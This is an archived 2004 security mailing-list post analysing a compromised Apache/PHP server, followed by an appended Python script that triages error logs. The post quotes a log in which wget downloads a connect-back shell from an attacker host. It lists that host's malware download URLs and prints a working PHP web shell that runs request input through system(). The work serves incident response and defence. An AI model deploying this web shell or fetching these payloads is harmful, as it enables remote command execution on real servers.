Open Source and information security mailing list archives
Message-ID: <015701c4b9fc$a09e1bb0$0200000a@Accenture.com>
From: eflorio at edmaster.it (Elia Florio)
Subject: xpire.info & splitinfinity.info - exploits in the wild

> I'm not sure that qmail-inject isn't a red herring?  The actual
> download looks like 'wget' was used.
Good suggestion, my friend :)

WGET was used to retrieve the http://xpire.info/cli.gz connect-back shell.
After further analysis I found that another person had the same problem:

http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here is the log captured by Apache:

--------------------------------------------------------------------------------
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........                                   100%   20.04 KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, you can see that in the log I showed first the stdout
was in Italian (because the compromised server is .it), while in this case it is
in English.
The hacker launched the WGET command to retrieve his hacking tool into /tmp/a.out.
In this log you can also see that the hacker tried to execute some "ls"
commands, as a first trial to test the vulnerability, I suppose.
Moved by this, after further analysis I found that the vulnerability used is an
obvious-but-effective PHP injection using global variables
(http://www.securityfocus.com/archive/1/218000 is a good page to learn
something about this vuln).

The hacker pages used to accomplish the injection are based on this
test page, taken directly from the hacker site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojans/backdoors/shells/worms/exploits and
other malware.... why is it still up?

http://xpire.info/cli.gz        // connect-back shell
http://xpire.info/fa/aga.exe    // agobot family
http://xpire.info/install.gz    // some trojan/malware ???? my NortonAV does not catch it; it's a Windows EXE

This is a sample of the PHP-injection page:
<?
// Fingerprint the host: these two commands produce the "uname" output and the
// "ls: /usr/bin/X11/X: No such file or directory" lines seen in the log above.
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<!-- $REQUEST_URI and $lox are populated from the request by register_globals -->
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>
Using the PHP "system" call, it is possible to execute any remote command, like
WGET for example.
Did anyone know of this page before???


> I assume you used a bootable CD on the infected machine to do the
> checksums?
Unfortunately (I know that this is a *must* for a good analysis) I'm doing
the check remotely, using SSH, so I cannot use a bootable CD to connect to this
remote host very far from me :)
I'm limited in the analysis..... but the host is not mine!
However I think that md5sum gave me good results, because I compared the whole
/usr/sbin directory and all the checksums were good, except for
/usr/sbin/crond...... any ideas???
I also used the "rpm -Vf" utility to cross-check the results, and they were the
same as md5sum.

> Check the httpd.conf (and other apache configuration files) for any
> changes, and also the contents of each module loaded.  It's also
> possible, but less likely, that the injection is done in a kernel
> module.
It's my fear :(((((((((( I studied all the *.conf files related to the
Apache/PHP modules of this machine, but nothing was found. An injected LKM
could be the only answer.

I also ran "chkrootkit" as someone suggested to me, but all the tests gave a
positive answer (no worm, no rootkit, no trojan).

> Sounds like a good time to replace the entire server with a fresh build.
Actually my work will finish when this activity begins :))))))

Thank you for the help, Kevin.

EF
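The reason the wget transcript and the "ls: ... No such file or directory" lines show up in the Apache log at all is that a command run through PHP's system() is a child of httpd, and httpd's stderr is the ErrorLog: stdout goes back into the HTTP response, stderr lands in error_log. Anything in error_log that is not an Apache-formatted "[date] [level]" line is therefore worth a look. The following Python is an added example (not from the post or the thread) that triages an error_log on that basis: it separates such foreign lines from normal httpd logging, extracts the tool name from shell-style "tool: message" errors, and reassembles the old wget 1.x progress format into the fetched URL, the destination path and whether the download completed. The sample log is constructed here in the shape of the one quoted above; the regular expressions and the Finding/Triage types are assumptions of this example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: a slice of an Apache 1.3/2.0 error_log shaped like the
# one quoted in the post (not a real capture).
SAMPLE_ERROR_LOG = """\
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/include/sdk386: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]
18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
[Mon Aug 23 07:00:00 2004] [error] [client 10.0.0.2] File does not exist: /var/www/html/favicon.ico
"""

# Normal httpd logging: "[Mon Aug 23 06:25:18 2004] [notice] ..."
APACHE_LINE = re.compile(
    r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# Shell-style diagnostics from a tool a web shell would run: "ls: ...", "sh: ..."
TOOL_ERR = re.compile(r"^(ls|sh|bash|cat|id|uname|cd|wget|curl|chmod|tar|gzip): (.*)$")
# wget 1.x progress lines: start, destination and final "saved" line
WGET_START = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)")
WGET_DEST = re.compile(r"=>\s+`([^']+)'")
WGET_SAVED = re.compile(r"^(\d\d:\d\d:\d\d) .*?`([^']+)' saved \[(\d+)/(\d+)\]")


@dataclass
class Download:
    url: str
    dest: Optional[str] = None
    saved_bytes: Optional[int] = None
    complete: bool = False


@dataclass
class Triage:
    foreign_lines: List[str] = field(default_factory=list)   # not httpd-formatted
    tool_errors: List[Tuple[str, str]] = field(default_factory=list)
    downloads: List[Download] = field(default_factory=list)


def triage_error_log(text: str) -> Triage:
    """Split an error_log into httpd noise and child-process stderr, and
    reconstruct any wget transfers found in the latter."""
    t = Triage()
    current: Optional[Download] = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line or APACHE_LINE.match(line):
            continue                      # ordinary httpd logging
        t.foreign_lines.append(line)      # stderr of something httpd spawned
        m = TOOL_ERR.match(line)
        if m:
            t.tool_errors.append((m.group(1), m.group(2)))
            continue
        m = WGET_START.match(line)
        if m:
            current = Download(url=m.group(2))
            t.downloads.append(current)
            continue
        if current is None:
            continue
        m = WGET_DEST.search(line)
        if m:
            current.dest = m.group(1)
            continue
        m = WGET_SAVED.match(line)
        if m:
            current.dest = current.dest or m.group(2)
            current.saved_bytes = int(m.group(3))
            current.complete = m.group(3) == m.group(4)   # got all advertised bytes
            current = None


    return t


def report(t: Triage) -> List[str]:
    """Human-readable findings; dropped files are the first things to hash and pull."""
    out = [f"{len(t.foreign_lines)} non-httpd line(s) in error_log (child-process stderr)"]
    for tool, msg in t.tool_errors:
        out.append(f"command probe: {tool}: {msg}")
    for d in t.downloads:
        state = "complete" if d.complete else "partial/unknown"
        out.append(f"download: {d.url} -> {d.dest} ({d.saved_bytes} bytes, {state})")
    return out


if __name__ == "__main__":
    for line in report(triage_error_log(SAMPLE_ERROR_LOG)):
        print(line)
```

Run against a real error_log, every path listed under "download:" is a candidate for md5sum/rpm -Vf and for preservation before the rebuild; the ls/sh probes give the earliest timestamps to look for in access_log, which is where the POST carrying the injected "lox" value would be.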
